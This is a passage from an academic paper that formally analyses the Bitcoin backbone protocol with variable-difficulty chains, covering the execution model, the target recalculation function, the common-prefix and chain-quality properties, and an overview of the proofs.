command that captures this “send-to-all” functionality.\n\nThe parties that may become active in a protocol execution are encoded as part of a control program C and come from a universe $$\\mathcal {U}$$ of parties.\n\nThe protocol execution is driven by an environment program $$\\mathcal {Z}$$ that interacts with other instances of programs that it spawns at the discretion of the control program C. The pair $$(\\mathcal {Z}, C)$$ forms of a system of interactive Turing machines (ITM’s) in the sense of . The execution is with respect to a program $$\\varPi$$, an adversary $$\\mathcal {A}$$ (which is another ITM) and the universe of parties $$\\mathcal {U}$$. Assuming the control program C allows it, the environment $$\\mathcal {Z}$$ can activate a party by writing to its input tape. Note that the environment $$\\mathcal {Z}$$ also receives the parties’ outputs when they are produced in a standard subroutine-like interaction. Additionally, the control program maintains a flag for each instance of an ITM, (abbreviated as ITI in the terminology of ), that is called the $$\\mathtt {ready}$$ flag and is initially set to false for all parties.\n\nThe environment $$\\mathcal {Z}$$, initially is restricted by C to spawn the adversary $$\\mathcal {A}$$. Each time the adversary is activated, it may send one or more messages of the form $$(\\mathsf {Corrupt}, P_i)$$ to C and C will mark the corresponding party as corrupted.\n\nFunctionalities Available to the Protocol. The ITI’s of protocol $$\\varPi$$ will have access to a joint ideal functionality capturing the random oracle and the diffusion mechanism which is defined in a similar way as and is explained below.\n\n• The random oracle functionality. Given a query with a value x marked for “calculation” for the function $$H(\\cdot )$$ from an honest party $$P_i$$ and assuming x has not been queried before, the functionality returns a value y which is selected at random from $$\\{0,1\\}^\\kappa$$; furthermore, it stores the pair (xy) in the table of $$H(\\cdot )$$, in case the same value x is queried in the future. Each honest party $$P_i$$ is allowed to ask q queries in each round as determined by the diffusion functionality (see below). On the other hand, each honest party is given unlimited queries for “verification” for the function $$H(\\cdot )$$. The adversary $$\\mathcal {A}$$, on the other hand, is given a bounded number queries in each round as determined by diffusion functionality with a bound that is initialized to 0 and determined as follows: whenever a corrupted party is activated, the party can ask the bound to be increased by q; each time a query is asked by the adversary the bound is decreased by 1. No verification queries are provided to $$\\mathcal {A}$$. Note that the value q is a polynomial function of $$\\kappa$$, the security parameter. The functionality can maintain tables for functions other than $$H(\\cdot )$$ but, by convention, the functionality will impose query quotas to function $$H(\\cdot )$$ only.\n\n• The diffusion functionality. This functionality keeps track of rounds in the protocol execution; for this purpose it initially sets a variable round to be 1. It also maintains a Receive() string defined for each party $$P_i$$ in $$\\mathcal {U}$$. A party that is activated is allowed to query the functionality and fetch the contents of its personal Receive() string. Moreover, when the functionality receives a message $$(\\mathsf {Diffuse}, m)$$ from party $$P_i$$ it records the message m. A party $$P_i$$ can signal when it is complete for the round by sending a special message $$(\\mathsf {RoundComplete})$$. With respect to the adversary $$\\mathcal {A}$$, the functionality allows it to receive the contents of all contents sent in $$\\mathsf {Diffuse}$$ messages for the round and specify the contents of the Receive() string for each party $$P_i$$. The adversary has to specify when it is complete for the current round. When all parties are complete for the current round, the functionality inspects the contents of all Receive() strings and includes any messages m that were diffused by the parties in the current round but not contributed by the adversary to the Receive() tapes (in this way guaranteeing message delivery). It also flushes any old messages that were diffused in previous rounds and not diffused again. The variable round is then incremented.\n\nThe Dynamic $${\\varvec{q}}$$ -Bounded Synchronous Setting. Consider $$\\mathbf {n} = \\{n_r\\}_{r\\in \\mathbb {N}}$$ and $$\\mathbf {t} = \\{t_r\\}_{r\\in \\mathbb {N}}$$ two series of natural numbers. As mentioned, the first instance that is spawned by $$\\mathcal {Z}$$ is the adversary $$\\mathcal {A}$$. Subsequently the environment may spawn (or activate if they are already spawned) parties $$P_i\\in \\mathcal {U}$$. The control program maintains a counter in each sequence of activations and matches it with the current round that is maintained by the diffusion functionality. Each time an honest party diffuses a message containing the label “$$\\mathtt {ready}$$” the control program C increases the ready counter for the round. In round r, the control program C will enable the adversary $$\\mathcal {A}$$ to complete the round, only provided that (i) exactly $$n_r$$ parties have transmitted $$\\mathtt {ready}$$ message, (ii) the number of (“corrupt”) parties controlled by $$\\mathcal {A}$$ should match $$t_r$$.\n\nParties, when activated, are able to read their input tape $$\\mathrm{I}\\textsc {nput}()$$ and communication tape $$\\mathrm{R}\\textsc {eceive}()$$ from the diffusion functionality. Observe that parties are unaware of the set of activated parties. The Bitcoin backbone protocol requires from parties (miners) to calculate a POW. This is modeled in as parties having access to the oracle $$H(\\cdot )$$. The fact that (active) parties have limited ability to produce such POWs, is captured as in  by the random oracle functionality and the fact that it paces parties to query a limited number of queries per round. The bound, q, is a function of the security parameter $$\\kappa$$; in this sense the parties may be called q-bounded4. We refer to the above restrictions on the environment, the parties and the adversary as the dynamic q -bounded synchronous setting.\n\nThe term $$\\{\\textsc {view} ^{P, \\mathbf {t},\\mathbf {n}}_{\\varPi , \\mathcal {A},\\mathcal {Z}}(z)\\}_{z\\in \\{0,1\\}^*}$$ denotes the random variable ensemble describing the view of party P after the completion of an execution running protocol $$\\varPi$$ with environment $$\\mathcal {Z}$$ and adversary $$\\mathcal {A}$$, on input $$z\\in \\{0,1\\}^*$$. We will only consider a “standalone” execution without any auxiliary information and we will thus restrict ourselves to executions with $$z = 1^\\kappa$$. For this reason we will simply refer to the ensemble by $$\\textsc {view} ^{P,\\mathbf {t},\\mathbf {n}}_{\\varPi ,\\mathcal {A},\\mathcal {Z}}$$. The concatenation of the view of all parties ever activated in the execution is denoted by $$\\textsc {view} ^{\\mathbf {t},\\mathbf {n}}_{\\varPi , \\mathcal {A},\\mathcal {Z}}$$.\n\nProperties of Protocols. In our theorems we will be concerned with properties of protocols $$\\varPi$$ running in the above setting. Such properties will be defined as predicates over the random variable $$\\textsc {view} ^{ \\mathbf {t},\\mathbf {n} }_{\\varPi , \\mathcal {A},\\mathcal {Z}}$$ by quantifying over all possible adversaries $$\\mathcal {A}$$ and environments $$\\mathcal {Z}$$. Note that all our protocols will only satisfy properties with a small probability of error in $$\\kappa$$ as well as in a parameter k that is selected from $$\\{1,\\ldots ,\\kappa \\}$$ (with foresight we note that in practice would be able to choose k to be much smaller than $$\\kappa$$, e.g., $$k=6$$).\n\nThe protocol class that we will analyze will not be able to preserve its properties for arbitrary sequences of parties. To restrict the way the sequence $$\\mathbf {n}$$ is fluctuating we will introduce the following class of sequences.\n\n### Definition 1\n\nFor $$\\gamma \\in \\mathbb {R}^+$$, we call a sequence $$(n_r)_{r \\in \\mathbb {N}}$$ $$(\\gamma ,s)$$ -respecting if for any set S of at most s consecutive rounds, $$\\max _{r\\in S} n_r \\le \\gamma \\cdot \\min _{r\\in S} n_r$$.\n\nObserve that the above definition is fairly general and also can capture exponential growth; e.g., by setting $$\\gamma =2$$ and $$s=10$$, it follows that every 10 rounds the number of ready parties may double. Note that this will not lead to an exponential running time overall since the total run time is bounded by a polynomial in $$\\kappa$$, (due to the fact that $$(\\mathcal {Z}, C)$$ is a system of ITM’s, $$\\mathcal {Z}$$ is locally polynomial bounded, C is a polynomial-time program, and thus [5, Proposition 3] applies).\n\nMore formally, a protocol $$\\varPi$$ would satisfy a property Q for a certain class of sequences $$\\mathbf {n}, \\mathbf {t}$$, provided that for all PPT $$\\mathcal {A}$$ and locally polynomial bounded $$\\mathcal {Z}$$, it holds that $$Q(\\textsc {view} ^{\\mathbf {t},\\mathbf {n}}_{\\varPi , \\mathcal {A},\\mathcal {Z}})$$ is true with overwhelming probability of the coins of $$\\mathcal {A},\\mathcal {Z}$$ and the random oracle functionality.\n\nIn this paper, we will be interested in $$(\\gamma , s)$$-respecting sequences $$\\mathbf {n}$$, sequences $$\\mathbf {t}$$ suitably restricted by $$\\mathbf {n}$$, and protocols $$\\varPi$$ suitably parameterized given $$\\mathbf {n}, \\mathbf {t}$$.\n\n## 3 Blockchains of Variable Difficulty\n\nWe start by introducing blockchain notation; we use similar notation to , and expand the notion of blockchain to explicitly include timestamps (in the form of a round indicator). Let $$G(\\cdot )$$ and $$H(\\cdot )$$ be cryptographic hash functions with output in $$\\{0,1\\}^\\kappa$$. A block with target $$T \\in \\mathbb {N}$$ is a quadruple of the form $$B=\\langle r, st, x, ctr\\rangle$$ where $$st\\in \\{0,1\\}^\\kappa , x \\in \\{0,1\\}^*$$, and $$r,ctr\\in \\mathbb {N}$$ are such that they satisfy the predicate $$\\mathsf {validblock}^T_q(B)$$ defined as\n\\begin{aligned} ( H( ctr, G(r, st, x)) < T ) \\wedge (ctr\\le q). \\end{aligned}\nThe parameter $$q \\in \\mathbb {N}$$ is a bound that in the Bitcoin implementation determines the size of the register ctr; as in , in our treatment we allow q to be arbitrary, and use it to denote the maximum allowed number of hash queries in a round (cf. Sect. 2). We do this for convenience and our analysis applies in a straightforward manner to the case that ctr is restricted to the range $$0 \\le ctr <2^{32}$$ and q is independent of ctr.\n\nA blockchain, or simply a chain is a sequence of blocks. The rightmost block is the head of the chain, denoted $$\\mathrm {head}(\\mathcal {C})$$. Note that the empty string $$\\varepsilon$$ is also a chain; by convention we set $$\\mathrm {head}(\\varepsilon ) = \\varepsilon$$. A chain $$\\mathcal {C}$$ with $$\\mathrm {head}(\\mathcal {C}) = \\langle r, st,x,ctr\\rangle$$ can be extended to a longer chain by appending a valid block $$B = \\langle r', st', x', ctr' \\rangle$$ that satisfies $$st' = H( ctr, G(r , st,x) )$$ and $$r'>r$$, where $$r'$$ is called the timestamp of block B. In case $$\\mathcal {C}=\\varepsilon$$, by convention any valid block of the form $$\\langle r', st',x', ctr'\\rangle$$ may extend it. In either case we have an extended chain $$\\mathcal {C}_\\mathsf {new} = \\mathcal {C}B$$ that satisfies $$\\mathrm {head}(\\mathcal {C}_\\mathsf {new}) = B$$.\n\nThe length of a chain $$\\mathop {\\mathrm {len}}(\\mathcal {C})$$ is its number of blocks. Consider a chain $$\\mathcal {C}$$ of length $$\\ell$$ and any nonnegative integer k. We denote by $$\\mathcal {C}^{\\lceil k}$$ the chain resulting from “pruning” the k rightmost blocks. Note that for $$k\\ge \\mathop {\\mathrm {len}}(\\mathcal {C})$$, $$\\mathcal {C}^{\\lceil k}=\\varepsilon$$. If $$\\mathcal {C}_1$$ is a prefix of $$\\mathcal {C}_2$$ we write $$\\mathcal {C}_1 \\preceq \\mathcal {C}_2$$.\n\nGiven a chain $$\\mathcal {C}$$ of length $$\\mathop {\\mathrm {len}}(\\mathcal {C}) = \\ell$$, we let $$\\mathbf x_\\mathcal {C}$$ denote the vector of $$\\ell$$ values that is stored in $$\\mathcal {C}$$ and starts with the value of the first block. Similarly, $$\\mathbf r_\\mathcal {C}$$ is the vector that contains the timestamps of the blockchain $$\\mathcal {C}$$.\n\nFor a chain of variable difficulty, the target T is recalculated for each block based on the round timestamps of the previous blocks. Specifically, there is a function $$D: \\mathbb {Z}^* \\rightarrow \\mathbb {R}$$ which receives an arbitrary vector of round timestamps and produces the next target. The value $$D(\\varepsilon )$$ is the initial target of the system. The difficulty of each block is measured in terms of how many times the block is harder to obtain than a block of target $$T_0$$. In more detail, the difficulty of a block with target T is equal to $$T_0/T$$; without loss of generality we will adopt the simpler expression 1 / T (as $$T_0$$ will be a constant across all executions). We will use $$\\mathrm {diff}(\\mathcal {C})$$ to denote the difficulty of a chain. This is equal to the sum of the difficulties of all the blocks that comprise the chain.\n\nThe Target Calculation Function. Intuitively, the target calculation function $$D(\\cdot )$$ aims at maintaining the block production rate constant. It is parameterized by $$m\\in \\mathbb {N}$$ and $$f\\in (0,1)$$; Its goal is that m blocks will be produced every m / f rounds. We will see in Sect. 6 that the probability f(Tn) with which n parties produce a new block with target T is approximated by\n\\begin{aligned} f(T,n)\\approx \\frac{qTn}{2^\\kappa }. \\end{aligned}\n(Note that $$T/2^{\\kappa }$$ is the probability that a single player produces a block in a single query.)\nTo achieve the above goal Bitcoin tries to keep $${qTn}/{2^\\kappa }$$ close to f. To that end, Bitcoin waits for m blocks to be produced and based on their difficulty and how fast these blocks were computed it computes the next target. More specifically, say the last m blocks of a chain $$\\mathcal {C}$$ are for target T and were produced in $$\\varDelta$$ rounds. Consider the case where a number of players\n\\begin{aligned} n(T,\\varDelta )=\\frac{2^\\kappa m}{qT\\varDelta } \\end{aligned}\nattempts to produce m blocks of target T; note that it will take them approximately $$\\varDelta$$ rounds in expectation. Intuitively, the number of players at the point when m blocks were produced is estimated by $$n(T,\\varDelta )$$; then the next target $$T'$$ is set so that $$n(T,\\varDelta )$$ players would need m / f rounds in expectation to produce m blocks of target $$T'$$. Therefore, it makes sense to set\n\\begin{aligned} T'=\\frac{\\varDelta }{m/f}\\cdot T, \\end{aligned}\nbecause if the number of players is indeed $$n(T,\\varDelta )$$ and remains unchanged, it will take them m / f rounds in expectation to produce m blocks. If the initial estimate of the number parties is $$n_0$$, we will assume $$T_0$$ is appropriately set so that $$f\\approx q T_0 n_0/2^\\kappa$$ and then\n\\begin{aligned} T'=\\frac{n_0}{n(T,\\varDelta )}\\cdot T_0. \\end{aligned}\n\n### Remark 1\n\nRecall that in the flat q-bounded setting all parties have the same hashing power (q-queries per round). It follows that $$n_0$$ represents the estimated initial hashing power while $$n(T,\\varDelta )$$ the estimated hashing power during the last m blocks of the chain $$\\mathcal {C}$$. As a result the new target is equal to the initial target $$T_0$$ multiplied by the factor $$n_0/n(T,\\varDelta )$$, reflecting the change of hashing power in the last m blocks.\n\nBased on the above we give the formal definition of the target (re)calculation function, which is as follows.\n\n### Definition 2\n\nFor fixed constants $$\\kappa ,\\tau ,m,n_0,T_0$$, the target calculation function $$D:\\mathbb {Z}^*\\rightarrow \\mathbb {R}$$ is defined as\n$$D(\\varepsilon )=T_0\\quad \\text {and}\\quad D(r_1,\\dots ,r_v)= {\\left\\{ \\begin{array}{ll} \\frac{1}{\\tau }\\cdot T &{}\\hbox {if } \\frac{n_0}{n(T,\\varDelta )}\\cdot T_0<\\frac{1}{\\tau }\\cdot T \\hbox {;}\\\\ \\tau \\cdot T&{}\\hbox {if } \\frac{n_0}{n(T,\\varDelta )}\\cdot T_0>\\tau \\cdot T \\hbox {;}\\\\ \\frac{n_0}{n(T,\\varDelta )}\\cdot T_0&{}\\hbox {otherwise,}\\\\ \\end{array}\\right. }$$\nwhere $$n(T,\\varDelta )=2^\\kappa m /qT\\varDelta$$, with $$\\varDelta =r_{m'}-r_{m'-m}$$, $$T=D(r_1,\\dots ,r_{m'-1})$$, and $$m'={m\\cdot \\lfloor v/m\\rfloor }$$.\n\nIn the definition, $$(r_1,\\dots ,r_v)$$ corresponds to a chain of v blocks with $$r_i$$ the timestamp of the ith block; $$m',\\varDelta ,$$ and T correspond to the last block, duration, and target of the last completed epoch, respectively.\n\n### Remark 2\n\nA remark is in order about the case $$\\frac{n_0}{n(T,\\varDelta )}\\cdot T_0\\notin [\\frac{1}{\\tau }T,\\tau T]$$, since this aspect of the definition is not justified by the discussion preceeding Definition 2. At first there may seem to be no reason to introduce such a “dampening filter” in Bitcoin’s target recalculation function and one should let the parties to try collectively to approximate the proper target. Interestingly, in the absence of such dampening, an efficient attack is known  (against the common-prefix property). As we will see, this dampening is sufficient for us to prove security against all attackers, including those considered in (with foresight, we can say that the attack still holds but it will take exponential time to mount).\n\n## 4 The Bitcoin Backbone Protocol with Variable Difficulty\n\nIn this section we give a high-level description of the Bitcoin backbone protocol with chains of variable difficulty; a more detailed description, including the pseudocode of the algorithms, is given in the full version. The presentation is based on the description in . We then formulate two desired properties of the blockchain—common prefix and chain quality—for the dynamic setting.\n\n### 4.1 The Protocol\n\nAs in , in our description of the backbone protocol we intentionally avoid specifying the type of values/content that parties try to insert in the chain, the type of chain validation they perform (beyond checking for its structural properties with respect to the hash functions $$G(\\cdot ),H(\\cdot )$$), and the way they interpret the chain. These checks and operations are handled by the external functions $$V(\\cdot ), I(\\cdot )$$ and $$R(\\cdot )$$ (the content validation function, the input contribution function and the chain reading function, resp.) which are specified by the application that runs “on top” of the backbone protocol. The Bitcoin backbone protocol in the dynamic setting comprises three algorithms.\n\nChain Validation. The $$\\mathsf {validate}$$ algorithm performs a validation of the structural properties of a given chain $$\\mathcal {C}$$. It is given as input the value q, as well as hash functions $$H(\\cdot ), G(\\cdot )$$. It is parameterized by the content validation predicate predicate $$V(\\cdot )$$ as well as by $$D(\\cdot )$$, the target calculation function (Sect. 3). For each block of the chain, the algorithm checks that the proof of work is properly solved (with a target that is suitable as determined by the target calculation function), and that the counter ctr does not exceed q. Furthermore it collects the inputs from all blocks, $${\\mathbf x}_\\mathcal {C}$$, and tests them via the predicate $$V(\\mathbf x_\\mathcal {C})$$. Chains that fail these validation procedure are rejected.\n\nChain Comparison. The objective of the second algorithm, called $$\\mathsf {maxvalid}$$, is to find the “best possible” chain when given a set of chains. The algorithm is straightforward and is parameterized by a $$\\mathsf {max} (\\cdot )$$ function that applies some ordering to the space of blockchains. The most important aspect is the chains’ difficulty in which case $$\\mathsf {max} ( \\mathcal {C}_1, \\mathcal {C}_2 )$$ will return the most difficult of the two. In case $$\\mathrm {diff}(\\mathcal {C}_1) = \\mathrm {diff}(\\mathcal {C}_2)$$, some other characteristic can be used to break the tie. In our case, $$\\mathsf {max} (\\cdot , \\cdot )$$ will always return the first operand to reflect the fact that parties adopt the first chain they obtain from the network.\n\nProof of Work. The third algorithm, called $$\\mathsf {pow}$$, is the proof of work-finding procedure. It takes as input a chain and attempts to extend it via solving a proof of work. This algorithm is parameterized by two hash functions $$H(\\cdot ),G(\\cdot )$$ as well as the parameter q. Moreover, the algorithm calls the target calculation function $$D(\\cdot )$$ in order to determine the value T that will be used for the proof of work. The procedure, given a chain $$\\mathcal {C}$$ and a value x to be inserted in the chain, hashes these values to obtain h and initializes a counter ctr. Subsequently, it increments ctr and checks to see whether $$H(ctr, h) < T$$; in case a suitable ctr is found then the algorithm succeeds in solving the POW and extends chain $$\\mathcal {C}$$ by one block.\n\nThe Bitcoin Backbone Protocol. The core of the backbone protocol with variable difficulty is similar to that in , with several important distinctions. First is the procedure to follow when the parties become active. Parties check the $$\\mathtt {ready}$$ flag they possess, which is false if and only if they have been inactive in the previous round. In case the $$\\mathtt {ready}$$ flag is false, they diffuse a special message ‘$$\\mathbf {Join}$$’ to request the most recent version of the blockchain(s). Similarly, parties that receive the special request message in their $$\\mathrm{R}\\textsc {eceive}()$$ tape broadcast their chains. As before parties, run “indefinitely” (our security analysis will apply when the total running time is polynomial in $$\\kappa$$). The input contribution function $$I(\\cdot )$$ and the chain reading function $$R(\\cdot )$$ are applied to the values stored in the chain. Parties check their communication tape $$\\mathrm{R}\\textsc {eceive}()$$ to see whether any necessary update of their local chain is due; then they attempt to extend it via the POW algorithm $$\\mathsf {pow}$$. The function $$I(\\cdot )$$ determines the input to be added in the chain given the party’s state st, the current chain $$\\mathcal {C}$$, the contents of the party’s input tape $$\\mathrm{I}\\textsc {nput}()$$ and communication tape Receive(). The input tape contains two types of symbols, $$\\mathrm{R}\\textsc {ead}$$ and $$(\\mathrm{I}\\textsc {nsert}, value)$$; other inputs are ignored. In case the local chain $$\\mathcal {C}$$ is extended the new chain is diffused to the other parties. Finally, in case a Read symbol is present in the communication tape, the protocol applies function $$R(\\cdot )$$ to its current chain and writes the result onto the output tape Output().\n\n### 4.2 Properties of the Backbone Protocol with Variable Difficulty\n\nNext, we define the two properties of the backbone protocol that the protocol will establish. They are close variants of the properties in , suitably modified for the dynamic q-bounded synchronous setting.\n\nThe common prefix property essentially remains the same. It is parameterized by a value $$k\\in \\mathbb {N}$$, considers an arbitrary environment and adversary, and it holds as long as any two parties’ chains are different only in their most recent k blocks. It is actually helpful to define the property between an honest party’s chain and another chain that may be adversarial. The definition is as follows.\n\n### Definition 3\n\n(Common-Prefix Property). The common-prefix property $$Q_\\mathsf {cp}$$ with parameter $$k\\in \\mathbb {N}$$ states that, at any round of the execution, if a chain $$\\mathcal {C}$$ belongs to an honest party, then for any valid chain $$\\mathcal {C}'$$ in the same round such that either $$\\mathrm {diff}(\\mathcal {C}')>\\mathrm {diff}(\\mathcal {C})$$, or $$\\mathrm {diff}(\\mathcal {C}')=\\mathrm {diff}(\\mathcal {C})$$ and $$\\mathrm {head}(\\mathcal {C}')$$ was computed no later than $$\\mathrm {head}(\\mathcal {C})$$, it holds that $$\\mathcal {C}^{\\lceil k}\\preceq \\mathcal {C}'\\hbox { and } \\mathcal {C}'^{\\lceil k}\\preceq \\mathcal {C}$$.\n\nThe second property, called chain quality, expresses the number of honest-party contributions that are contained in a sufficiently long and continuous part of a party’s chain. Because we consider chains of variable difficulty it is more convenient to think of parties’ contributions in terms of the total difficulty they add to the chain as opposed to the number of blocks they add (as done in ). The property states that adversarial parties are bounded in the amount of difficulty they can contribute to any sufficiently long segment of the chain.\n\n### Definition 4\n\n(Chain-Quality Property). The chain quality property $$Q_\\mathsf {cq}$$ with parameters $$\\mu \\in \\mathbb {R}$$ and $$\\ell \\in \\mathbb {N}$$ states that for any party P with chain $$\\mathcal {C}$$ in $$\\textsc {view} ^{\\mathbf {t},\\mathbf {n}}_{\\varPi , \\mathcal {A},\\mathcal {Z}}$$, and any segment of that chain of difficulty d such that the timestamp of the first block of the segment is at least $$\\ell$$ smaller than the timestamp of the last block, the blocks the adversary has contributed in the segment have a total difficulty that is at most $$\\mu \\cdot d$$.\n\n### 4.3 Application: Robust Transaction Ledger\n\nWe now come to the (main) application the Bitcoin backbone protocol was designed to solve. A robust transaction ledger is a protocol maintaining a ledger of transactions organized in the form of a chain $$\\mathcal {C}$$, satisfying the following two properties.\n\n• Persistence: Parameterized by $$k\\in \\mathbb {N}$$ (the “depth” parameter), if an honest party P, maintaining a chain $$\\mathcal {C}$$, reports that a transaction tx is in $$\\mathcal {C}^{\\lceil k}$$, then it holds for every other honest party $$P'$$ maintaining a chain $$\\mathcal {C}'$$ that if $$\\mathcal {C}'^{\\lceil k}$$ contains tx, then it is in exactly the same position.\n\n• Liveness: Parameterized by $$u,k\\in \\mathbb {N}$$ (the “wait time” and “depth” parameters, resp.), if a transaction tx is provided to all honest parties for u consecutive rounds, then it holds that for any player P, maintaining a chain $$\\mathcal {C}$$, tx will be in $$\\mathcal {C}^{\\lceil k}$$.\n\nWe note that, as in , Liveness is applicable to either “neutral” transactions (i.e., those that they are never in “conflict” with other transactions in the ledger), or transactions that are produced by an oracle $$\\mathsf {Txgen}$$ that produces honestly generated transactions.\n\n## 5 Overview of the Analysis\n\nOur main goal is to show that the backbone protocol satisfies the properties common prefix and chain quality (Sect. 4.2) in a $$(\\gamma ,s)$$-respecting environment as an intermediate step towards proving, eventually, that the protocol implements a robust transaction ledger. In this section we present a high-level overview of our approach; the full analysis is then presented in Sect. 6. To prove the aforementioned properties we first characterize the set of typical executions. Informally, an execution is typical if for any set S of consecutive rounds the successes of the adversary and the honest parties do not deviate too much from their expectations and no bad event occurs with respect to the hash function (which we model as a “random oracle”). Using the martingale bound of Theorem 6 we demonstrate that almost all polynomially bounded executions are typical. We then proceed to show that in a typical execution any chain that an honest party adopts (1) contains timestamps that are approximately accurate (i.e., no adversarial block has a timestamp that differs too much by its real creation time) and (2) has a target such that the probability of block production remains near a fixed constant f. Finally, these properties of a typical execution will bring us to our ultimate goal: to demonstrate that a typical execution enjoys the common prefix and the chain quality properties, and therefore one can build on the blockchain a robust transaction ledger (Sect. 4.3). Here we highlight the main steps and the novel concepts that we introduce.\n\n“Good” Executions. In order to be able to talk quantitatively about typical executions, we first introduce the notion of $$(\\eta ,\\theta )$$ -good executions, which expresses how well the parties approximate f. Suppose at round r exactly n parties query the oracle with target T. The probability at least one of them will succeed is\n\\begin{aligned} f(T,n)=1-\\Bigl (1-\\frac{T}{2^\\kappa }\\Bigr )^{qn}. \\end{aligned}\nFor the initial target $$T_0$$ and the initial estimate of the number of parties $$n_0$$, we denote $$f_0 = f(T_0, n_0)$$. Looking ahead, the objective of the target recalculation mechanism is to maintain a target T for each party such that $$f(T, n_r)\\approx f_0$$ for all rounds r. (For succintness, we will drop the subscript and simply refer to it as f.)\n\nNow, at a round r of an execution E the honest parties might be querying the random oracle for various targets. We denote by $$T_r^{\\min }(E)$$ and $$T_r^{\\max }(E)$$ the minimum and maximum over those targets. We say r is a target-recalculation point of a valid chain $$\\mathcal {C}$$, if there is a block with timestamp r and m exactly divides the number of blocks up to (and including) this block. Consider constants $$\\eta \\in (0,1]$$ and $$\\theta \\in [1,\\infty )$$ and an execution E:\n\nDefinition 5 (Abridged). A round r is $$(\\eta ,\\theta )$$ -good in E if $$\\eta f \\le f(T_r^{\\min }(E),n_r)$$ and $$f(T_r^{\\max }(E),n_r) \\le \\theta f$$. An execution E is $$(\\eta ,\\theta )$$ -good if every round of E was $$(\\eta ,\\theta )$$-good.\n\nWe are going to study the progress of the honest parties only when their targets lie in a reasonable range. It will turn out that, with high probability, the honest parties always work with reasonable targets. The following bound will be useful because it gives an estimate of the progress the honest parties have made in an $$(\\eta ,\\theta )$$-good execution. We will be interested in the progress coming from uniquely successful rounds, where exactly one honest party computed a POW. Let $$Q_r$$ be the random variable equal to the (maximum) difficulty of such rounds (recall a block with target T has difficulty 1 / T); 0 otherwise. We refer to $$Q_r$$ also as “unique” difficulty. We are able to show the following.\n\nProposition 2 (Informal). If r is an $$(\\eta ,\\theta )$$-good round in an execution E, then $$\\mathbf {E}[Q_r(E_{r-1})]\\ge (1-\\theta f){pn_r}$$, where $$Q_r(E_{r-1})$$ is the unique difficulty conditioned on the execution so far, and $$p =\\frac{q}{2^\\kappa }$$.\n\n“Per round” arguments regarding relevant random variables are not sufficient, as we need executions with “good” behavior over a sequence of rounds—i.e., variables should be concentrated around their means. It turns out that this is not easy to get, as the probabilities of the experiments performed per round depend on the history (due to target recalculation). To deal with this lack of concentration/variance problem, we introduce the following measure.\n\nTypical Executions. Intuitively, the idea that this notion captures is as follows. Note that at each round of a given execution E the parties perform Bernoulli trials with success probabilities possibly affected by the adversary. Given the execution, these trials are determined and we may calculate the expected progress the parties make given the corresponding probabilities. We then compare this value to the actual progress and if the difference is “reasonable” we declare E typical. Note, however, that considering this difference by itself will not always suffice, because the variance of the process might be too high. Our definition, in view of Theorem 6 (Appendix A), says that either the variance is high with respect to the set of rounds we are considering, or the parties have made progress during these rounds as expected. A bit more formally, for a given random oracle query in an execution E, the history of the execution just before the query takes place, determines the parameters of the distribution that the outcome of this query follows as a POW (a Bernoulli trial). For the queries performed in a set of rounds S, let V(S) denote the sum of the variances of these trials.\n\nDefinition 8 (Abridged). An execution E is $$(\\epsilon ,\\eta ,\\theta )$$-typical if, for any given set S of consecutive rounds such that V(S) is appropriately bounded from above:\n• The average unique difficulty is lower-bounded by $$\\frac{1}{|S|}(\\sum _{r\\in S}\\mathbf {E}[Q_r(E_{r-1})] -\\epsilon (1-\\theta f)p\\sum _{r\\in S}n_r)$$;\n\n• the average maximum difficulty is upper-bounded by $$\\frac{1}{|S|} (1+\\epsilon )p\\sum _{r\\in S}n_r$$;\n\n• the adversary’s average difficulty of blocks with “easy” targets is upper-bounded by $$\\frac{1}{|S|} (1+\\epsilon )p\\sum _{r\\in S}t_r$$, while the number of blocks with “hard” targets is bounded below m by a suitable constant; and\n\n• no “bad events” with respect to the hash function occur (e.g., collisions).\n\nThe following is one of the main steps in our analysis.\n\nProposition 4 (Informal). Almost all polynomially bounded executions (in $$\\kappa$$) are typical. The probability of an execution not being typical is bounded by $$\\exp (-\\varOmega ( \\min \\{ m, \\kappa \\}) + \\ln L)$$ where L is the total run-time.\n\nRecall (Remark 2) that the dynamic setting (specifically, the use of target recalculation functions) offers more opportunities for adversarial attacks . The following important intermediate lemma shows that if a typical execution is good up to a certain point, chains that are privately mined for long periods of time by the adversary will not be adopted by honest parties.\n\nLemma 2 (Informal). Let E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. If $$E_{r}$$ is $$(\\eta ,\\theta )$$-good, then, no honest party adopts at round $$r+1$$ a chain that has not been extended by an honest party for at least $$O(\\frac{m}{\\tau f})$$ consecutive rounds.\n\nAn easy corollary of the above is that in typical executions, the honest parties’ chains cannot contain blocks with timestamps that differ too much from the blocks’ actual creation times.\n\nCorollary 1 (Informal). Let E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. If $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good, then the timestamp of any block in $$E_{r}$$ is at most $$O(\\frac{m}{\\tau f})$$ away from its actual creation time (cf. the notion of accuracy in Definition 6).\n\nAdditional important results we obtain regarding $$(\\eta ,\\theta )$$-good executions are that their epochs last about as much as they should (Lemma 3), as well as a “self-correcting” property, which essentially says that if every chain adopted by an honest party is $$(\\eta \\gamma ,\\smash {\\frac{\\theta }{\\gamma }})$$-good in $$E_{r-1}$$ (cf. the notion of a good chain in Definition 5), then $$E_r$$ is $$(\\eta ,\\theta )$$-good (Corollary 2). The above (together with several smaller intermediate steps that we omit from this high-level overview) allow us to conclude:\n\nTheorem 1 (Informal). A typical execution in a $$(\\gamma ,s)$$-respecting environment is $$O(\\frac{m}{\\tau f})$$-accurate and $$(\\eta ,\\theta )$$-good.\n\nCommon Prefix and Chain Quality. Typical executions give us the two desired low-level properties of the blockchain:\n\nTheorems 2 and 3 (Informal). Let E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. Under the requirements of Table 1 (Sect. 6.1), common prefix holds for any $$k\\ge \\theta \\gamma m/ 8 \\tau$$ and chain quality holds for $$\\ell = m/16\\tau f$$ and $$\\mu \\le 1-\\delta /2$$, where for all r, $$t_r < n_r( 1-\\delta )$$.\n\nRobust Transaction Ledger. Given the above we then prove the properties of the robust transaction ledger:\n\nTheorems 4 and 5 (Informal). Under the requirements of Table 1, the backbone protocol satisfies persistence with parameter $$k=\\varTheta (m)$$ and liveness with wait time $$u=\\varOmega (m+k)$$ for depth k.\n\nWe refer to Sect. 6 for the full analysis of the protocol.\n\n## 6 Full Analysis\n\nIn this section we present the full analysis and proofs of the backbone protocol and robust transaction ledger application with chains of variable difficulty. The analysis follows at a high level the roadmap presented in Sect. 5.\n\n### 6.1 Additional Notation, Definitions, and Preliminary Propositions\n\nOur 